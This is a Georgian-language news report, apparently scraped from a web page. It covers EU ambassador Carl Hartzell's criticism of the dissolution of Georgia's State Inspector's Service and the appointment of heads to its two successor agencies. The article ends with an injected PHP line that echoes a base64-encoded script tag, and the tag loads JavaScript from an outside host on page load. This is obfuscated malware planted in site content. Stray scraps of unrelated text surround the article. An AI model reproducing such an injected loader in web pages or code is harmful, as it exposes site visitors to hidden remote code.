celsiusi
ავერსი საქკაბელი
ინსპექტორის სამსახურის ნაჩქარევად დაშლის ობიექტურ მიზეზებს კვლავ ვერ ვხედავთ, - ამის შესახებ ევროკავშირის ელჩმა საქართველოში კარლ ჰარცელმა განაცხადა.
 
საქმე ის არის, რომ გუშინ პარლამენტმა გაუქმებული ინსპექტორის სამსახურის ნაცვლად შექმნილი ორი უწყების ხელმძღვანელები დანიშნა. დეპუტატებმა კენჭისყრის შედეგად პერსონალური მონაცემთა დაცვის სამსახურის ხელმძღვანელის პოსტზე ლელა ჯანაშვილი, სპეციალური საგამოძიებო სამსახურის ხელმძღვანელის თანამდებობაზე კი კოკა კაციტაძე დაამტკიცა. 1-ელი მარტიდან პერსონალურ მონაცემთა დაცვის მოქმედი ინსპექტორი, ლონდა თოლორაია უსამსახუროდ რჩება.
 
"ჩვენ კვლავ ვერ ვხედავთ გასული წლის დეკემბერში, სახელმწიფო ინსპექტორის სამსახურის მოულოდნელად და ნაჩქარევად დაშლის და სახელმწიფო ინსპექტორის მანდატის ვადამდე შეწყვეტის ობიექტურ მიზეზებს. პარლამენტის მიერ გუშინ მიღებული დანიშვნებს ვითვალისწინებთ, თუმცა საკონსტიტუციო სასამართლოში მიმდინარე სააპელაციო პროცესის შედეგებს დაველოდებით.
 
უსაფრთხოების სექტორზე ეფექტიანი დემოკრატიული ზედამხედველობა და მონაცემთა სათანადო დაცვა საქართველოს იმ ვალდებულებებად რჩება, რომლებზეც ქვეყანა პასუხისმგებლია. ეს აუცილებელია იმისთვის, რომ ევროკავშირმა გამოხატოს ნება და იპოვოს შესაძლებლობა, დაეხმაროს საქართველოს ძირითად სფეროებში რეფორმების განხორციელებაში", - განაცხადა ჰარცელმა.
843
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");